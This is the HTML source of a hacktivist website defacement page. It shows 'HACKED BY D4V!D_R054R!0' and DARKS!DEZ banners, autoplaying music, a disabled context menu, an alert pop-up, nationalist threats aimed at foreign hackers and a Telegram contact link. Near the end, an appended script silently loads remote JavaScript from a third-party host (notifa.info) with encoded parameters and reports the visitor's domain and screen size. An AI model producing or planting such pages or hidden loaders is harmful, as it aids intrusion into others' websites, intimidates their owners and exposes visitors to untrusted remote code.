
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
 
 
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/howler/2.0.3/howler.min.js">

</script>

 
<script type="text/javascript">

 var sound = new Howl({src: ['https://e.top4top.io/m_2972vd8qv0.mp3'],loop: true,autoplay: true});
 sound.play();
 
</script>

 
</head>

<body onload="disableClick()" oncontextmenu="return false">

 
 
<script>
alert('HACKED BY D4V!D_R054R!0')
</script>

 
<title>
 >> Hacked By D4V!D_R054R!0 << 
</title>
 
 
<center>
  
<link href="https://fonts.googleapis.com/css?family=Audiowide" rel="stylesheet" type="text/css">
 
<link href="https://fonts.googleapis.com/css?family=Merriweather Sans" rel="stylesheet" type="text/css">
 
 
<link href="https://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet" type="text/css">
 
<link href="https://fonts.googleapis.com/css?family=Jura|Black Ops One|Aldrich" rel="stylesheet" type="text/css">
 
 
<link href="https://fonts.googleapis.com/css?family=Inconsolata|Orbitron" rel="stylesheet" type="text/css">
  
<link href="https://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
 
 
<meta content="HACKED BY BL4CK_P4N7H3R" name="description">
 
 
<meta content="DARKS!DEZ" name="keywords">
  
 
<style>

 
 body
 { 
 cursor: url("http://hellox.persiangig.com/DefacePage/negro.cur"), auto; 
 height: 100% 
 width: 100%
 margin: 0;
 padding: 0; 
 background-image: url('https://64.media.tumblr.com/20a51b2c8f5657f6d4553a7acd4d382d/tumblr_pmd6e6Ol7y1runoqyo8_r1_540.gifv');
 background-position: center;
 background-color: #000000;
 color: #FFFFFF;
 background-size: cover; } #back{ text-align: center; /*height: 10px; width: -900px;*/ margin: auto	; } #header{ padding-top: 0px; font-size: 45px; font-family: 'Orbitron', sans-serif; color: white; text-align: center; font-weight: bolder ; text-transform: none; } #by{ font-family: 'Black Ops One', cursive; color: white; font-size: 30px; text-align: center; } /*#header{ font-size:16px; color:#FFF; transition: all 0.3s ease-in; text-decoration:none; }*/ #header:hover{ color: red; -webkit-stroke-width: 5.3px; -webkit-stroke-color: #FFFFFF; -webkit-fill-color: #FFFFFF; text-shadow: 1px 0px 20px red; } #by:hover{ -webkit-stroke-width: 5.3px; -webkit-stroke-color: #FFFFFF; -webkit-fill-color: #FFFFFF; text-shadow: 1px 0px 20px white; } #texts{ font-family: 'Aldrich', sans-serif; color: white; font-size: 19px; text-align: center; } #footer{ color: white; /*padding-bottom: 40px;*/ /*	margin-bottom: 0px;*/ color: grey	; } #team{ font-size: 25px; } #info{ color: white; padding-bottom: 0px; margin-top: 3px; font-size: 16px; font-weight: normal; font-family: 'Orbitron', sans-serif; } #info a{ text-decoration: none; color: grey; } #info a:hover{ color: white; -webkit-stroke-width: 5.3px; -webkit-stroke-color: #FFFFFF; -webkit-fill-color: #FFFFFF; text-shadow: 1px 0px 20px white; } #hello{ font-size: 30px; -moz-transition: color 1s; -webkit-transition: color 1s; -ms-transition: color 1s; -o-transition: color 1s; transition: color 1.2s; } #hello:hover{ color: red; -webkit-stroke-width: 5.3px; -webkit-stroke-color: #FFFFFF; -webkit-fill-color: #FFFFFF; text-shadow: 1px 0px 20px red; } /*#col{ color: green;*/ } #gmsg{ color: grey; } 
    

   
</style>


 
<script type="63ec8ee535102690983097f2-text/javascript">
 //
<![CDATA[ function tb9_makeArray(n){ this.length = n; return this.length; } tb9_messages = new tb9_makeArray(1); tb9_messages[0] = "HACKED BY DARK PREDAT0RZ"; tb9_rptType = 'infinite'; tb9_rptNbr = 5; tb9_speed = 100; tb9_delay = 2000; var tb9_counter=1; var tb9_currMsg=0; var tb9_timerID = null var tb9_bannerRunning = false var tb9_state = "" tb9_clearState() function tb9_stopBanner() { if (tb9_bannerRunning) clearTimeout(tb9_timerID) tb9_timerRunning = false } function tb9_startBanner() { tb9_stopBanner() tb9_showBanner() } function tb9_clearState() { tb9_state = "" for (var i = 0; i 
< tb9_messages[tb9_currMsg].length;   i) { tb9_state  = "0" } } function tb9_showBanner() { if (tb9_getString()) { tb9_currMsg   if (tb9_messages.length 
<= tb9_currMsg) { if ((tb9_rptType == 'finite') && (tb9_counter==tb9_rptNbr)){ tb9_stopBanner(); return; } tb9_counter  ; tb9_currMsg=0; } tb9_clearState() tb9_timerID = setTimeout("tb9_showBanner()", tb9_delay) } else { var tb9_str = "" for (var j = 0; j 
< tb9_state.length;   j) { tb9_str  = (tb9_state.charAt(j) == "1") ? tb9_messages[tb9_currMsg].charAt(j) : "_" } document.title = tb9_str tb9_timerID = setTimeout("tb9_showBanner()", tb9_speed) } } function tb9_getString() { var full = true for (var j = 0; j 
< tb9_state.length;   j) { if (tb9_state.charAt(j) == 0) full = false } if (full) return true while (1) { var num = tb9_getRandom(tb9_messages[tb9_currMsg].length) if (tb9_state.charAt(num) == "0") break } tb9_state = tb9_state.substring(0, num)   "1"   tb9_state.substring(num   1, tb9_state.length) return false } function tb9_getRandom(max) { var now = new Date() var num = now.getTime() * now.getSeconds() * Math.random() return num % max } tb9_startBanner() //]]>


 
</script>
  
  
<audio loop="https://e.top4top.io/m_2972vd8qv0.mp3" autoplay="">
 
<source src="https://dl.dropboxusercontent.com/s/8mzyajztaefre79/dolly.mp3?dl=0" type="audio/mpeg">
 
</audio>
  
 
<div id="header">

<b>
HACKED
</b>
 
 
<div id="team">

<b>
BY D4V!D_R054R!0
</b>

 
</div>
 
</div>
 
 
<div id="back">
 
<br>
 
<center>

<img src="https://i.postimg.cc/bYnwWQPT/Picsart-24-02-20-00-11-12-635.png" alt="DARK_S!DEZ" height="400" width="400">

</center>
   
 
</div>
 
 
<br>
 
  
 
<div id="info">
 
<b>
FEEL THE POWER OF D4RKS!DEZ
</b>

 
<br>


<br>


<div id="texts">
 
<div id="hello">

<b>
TEAM DARK-D4RKS!DEZ
</b>

</div>
<br>
<br>

<style>
    .whiteglow {
   text-shadow: 0 0 20px #2a6bd5;
   font-weight: bold;
   webkit-filter:url("#glitch");filter:url("#glitch");text-align:center
   } 
   </style>
      <div style="font-size:30;"class="whiteglow">BETTER STAY AWAY FROM INDIAN CYBER SPACE</div>
   
   <svg xmlns="http://www.w3.org/2000/svg" version="1.1">
   <defs>
   <filter id="glitch" x="0" y="0">
   <fecolormatrix in="SourceGraphic" mode="matrix" values="1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0" result="r" />
   <feoffset in="r" result="r" dx="-5">
   <animate attributename="dx" attributetype="XML" values="0; -5; 0; -18; -2; -4; 0 ;-3; 0" dur="0.2s" repeatcount="indefinite" />
   </feoffset>
   <fecolormatrix in="SourceGraphic" mode="matrix" values="0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 0" result="g" />l
   <feoffset in="g" result="g" dx="-5" dy="1">
   <animate attributename="dx" attributetype="XML" values="0; 0; 0; -3; 0; 8; 0 ;-1; 0" dur="0.15s" repeatcount="indefinite" />
   </feoffset>
   <fecolormatrix in="SourceGraphic" mode="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 1 0" result="b" />
   <feoffset in="b" result="b" dx="5" dy="2">
   <animate attributename="dx" attributetype="XML" values="0; 3; -1; 4; 0; 2; 0 ;18; 0" dur="0.35s" repeatcount="indefinite" />
   </feoffset>
   <feblend in="r" in2="g" mode="screen" result="blend" />
   <feblend in="blend" in2="b" mode="screen" result="blend" />
   </filter>
   </defs>
   </svg>
 
 
<div id="info">
 
</b>


</div>


<div id="that">


</div>
 

 
<div id="msg2">

<b>
    JAI HIND, PROUD T0 BE AN INDIAN
</b>

 
</div>

<br>
 
 
<div id="msg3">

<b>
D4V!D_R054R!0 (GOKUL) was here, മലയാളി ഡാ
</b>

 
</div>

<br>

 
<div id="msg3">

<b>
UNITED HACKERS OF INDIA
</b>

 
</div>

<br>

 
<div id="greetz">

<b>
 WE ARE 
</b>
 
<marquee>

<b>
|  D4V!D_R054R!0  |  BL4CK_P4N7H3R  |
</b>

</marquee>
 
 
</div>
 
<hr>
 
<div id="texts">
 
<div id="info" align="CENTER">

<b>
>>>
</b>

<a href="https://t.me/D4rkSidez" target="_blank">

<b>
CONTACT DARKS!DEZ
</b>

</a>

<b>
<<<
</b>

</div>
 
</div>
 
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="63ec8ee535102690983097f2-|49" defer="">

</script>

<script>
(function(){var js = "window['__CF$cv$params']={r:'8533c6870f018953',t:'MTcwNzU2MjA2Mi4xMDQwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXrcSYx6PJaqwnFrqL%2bJWAR7S8UrgnPOwKcCpwxealXyan1%2b4XHYuiA7nB0%2f747D4sEt%2fSLqpMNSLinu7urQL0E%2baRNFK3PB09lOoapwFHyGNDIWaP4KJw0o70QMKcTg%2fqlQV%2ff1BqyvPFz5YO5%2fqaz1XJaAp1CSazn1lPp5aGAx3VCk9RQXbT%2fJLoIhVo8%2bWg71deh9MxfIT7uFLevvmkH5VCwZfsaIXSw%2fURtHlH945N%2bbOqb6SC7E6b2OBL%2bLmW75xG5U2ceYYQz%2bw6MBMw2bID2ha%2fwiVhIKvEQ7aEd4HUB%2fZWrzWs%2fyuu5PeGUBJwrW4tbeinR61AfDPPCmkpP3wuXMrV9I1nTsbbDZEml%2fY0yf%2fOG2fL7t0MpqMPmslsAZ5vTPgVowASiwtiJ9nRP2s25NBv4VfSbSi4JS0%2fWWF5kDq6uJuZjlubZ5oNEmO0t4QycAoFuvFW2dTaCXnAUNd71l71mPs%2b%2bCc7pPRZxG1H68hnwJ6uUyVwXdRYaZoa8iu2WM02DkX%2b%2fxBmjDGcCK%2f4Pg6GmX5zeaijfPdzdxroa9WK0vhH0e4k%2ba9eSH1YXoQdg8nDikE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
</script>
 
</div>

</div>

</center>

</body>

</html>